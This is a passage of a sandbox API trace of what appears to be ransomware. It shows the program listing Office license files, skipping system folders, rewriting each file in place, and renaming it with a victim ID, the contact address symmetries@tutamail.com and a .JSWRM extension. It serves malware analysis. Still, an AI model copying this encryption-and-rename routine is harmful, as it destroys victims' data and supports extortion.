lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0104.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0104.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0104.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0104.227] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5420d88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5420d88, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5505c31, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x679e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_SubTrial2-ppd.xrm-ms", cAlternateFileName="MO108C~1.XRM")) returned 1 [0104.227] lstrcmpiW (lpString1="MondoR_SubTrial2-ppd.xrm-ms", lpString2=".") returned 1 [0104.227] lstrcmpiW (lpString1="MondoR_SubTrial2-ppd.xrm-ms", lpString2="..") returned 1 [0104.227] lstrcmpiW (lpString1="MondoR_SubTrial2-ppd.xrm-ms", lpString2="...") returned 1 [0104.227] lstrcmpiW (lpString1="MondoR_SubTrial2-ppd.xrm-ms", lpString2="windows") returned -1 [0104.227] lstrcmpiW (lpString1="MondoR_SubTrial2-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.227] lstrcmpiW (lpString1="MondoR_SubTrial2-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.227] lstrcmpiW (lpString1="MondoR_SubTrial2-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.227] lstrcmpiW (lpString1="MondoR_SubTrial2-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.227] lstrcmpiW (lpString1="MondoR_SubTrial2-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.228] lstrcmpiW (lpString1="MondoR_SubTrial2-ppd.xrm-ms", lpString2="msocache") returned -1 [0104.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0104.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial2-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0104.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0104.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial2-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241268, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTrial2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0104.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0104.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0104.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial2-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0104.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0104.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial2-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x2413a8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTrial2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0104.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0104.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0104.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0104.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0104.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial2-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.228] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=26526) returned 1 [0104.228] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6790) returned 0x24c1d0 [0104.229] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6790, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x6790, lpOverlapped=0x0) returned 1 [0104.232] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.232] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6790, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x6790, lpOverlapped=0x0) returned 1 [0104.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.232] CloseHandle (hObject=0x45c) returned 1 [0104.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0104.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0104.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0104.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0104.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0104.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0104.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.232] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial2-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial2-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial2-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0104.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0104.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0104.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0104.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0104.233] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe54934e0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe54934e0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe559e56a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d50, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_SubTrial2-ul-oob.xrm-ms", cAlternateFileName="MOCCE8~1.XRM")) returned 1 [0104.233] lstrcmpiW (lpString1="MondoR_SubTrial2-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.233] lstrcmpiW (lpString1="MondoR_SubTrial2-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.233] lstrcmpiW (lpString1="MondoR_SubTrial2-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.233] lstrcmpiW (lpString1="MondoR_SubTrial2-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.234] lstrcmpiW (lpString1="MondoR_SubTrial2-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.234] lstrcmpiW (lpString1="MondoR_SubTrial2-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.234] lstrcmpiW (lpString1="MondoR_SubTrial2-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.234] lstrcmpiW (lpString1="MondoR_SubTrial2-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.234] lstrcmpiW (lpString1="MondoR_SubTrial2-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.234] lstrcmpiW (lpString1="MondoR_SubTrial2-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0104.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0104.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial2-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0104.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0104.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial2-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x240fc0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTrial2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0104.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0104.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0104.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial2-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0104.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0104.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial2-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x240ef8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTrial2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0104.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0104.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0104.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0104.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0104.234] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial2-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.235] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11600) returned 1 [0104.235] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0104.235] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0104.247] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.247] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0104.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.247] CloseHandle (hObject=0x45c) returned 1 [0104.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0104.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0104.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0104.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0104.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0104.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0104.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.248] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial2-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial2-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial2-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0104.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0104.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0104.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0104.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0104.249] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe53d491f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe53d491f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe54934e0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b83, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_Trial-pl.xrm-ms", cAlternateFileName="MOB483~1.XRM")) returned 1 [0104.249] lstrcmpiW (lpString1="MondoR_Trial-pl.xrm-ms", lpString2=".") returned 1 [0104.249] lstrcmpiW (lpString1="MondoR_Trial-pl.xrm-ms", lpString2="..") returned 1 [0104.249] lstrcmpiW (lpString1="MondoR_Trial-pl.xrm-ms", lpString2="...") returned 1 [0104.249] lstrcmpiW (lpString1="MondoR_Trial-pl.xrm-ms", lpString2="windows") returned -1 [0104.249] lstrcmpiW (lpString1="MondoR_Trial-pl.xrm-ms", lpString2="recovery") returned -1 [0104.249] lstrcmpiW (lpString1="MondoR_Trial-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.249] lstrcmpiW (lpString1="MondoR_Trial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.249] lstrcmpiW (lpString1="MondoR_Trial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.250] lstrcmpiW (lpString1="MondoR_Trial-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.250] lstrcmpiW (lpString1="MondoR_Trial-pl.xrm-ms", lpString2="msocache") returned -1 [0104.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Trial-pl.xrm-ms", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0104.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0104.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Trial-pl.xrm-ms", cchWideChar=22, lpMultiByteStr=0x2412e0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 22 [0104.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Trial-pl.xrm-ms", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0104.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0104.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Trial-pl.xrm-ms", cchWideChar=22, lpMultiByteStr=0x241218, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 22 [0104.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0104.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0104.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0104.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_trial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.250] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11139) returned 1 [0104.251] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b80) returned 0x24c1d0 [0104.251] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b80, lpOverlapped=0x0) returned 1 [0104.253] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.253] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b80, lpOverlapped=0x0) returned 1 [0104.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.253] CloseHandle (hObject=0x45c) returned 1 [0104.253] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0104.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.253] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.253] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.253] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0104.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0104.253] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0104.253] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0104.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0104.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.253] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft 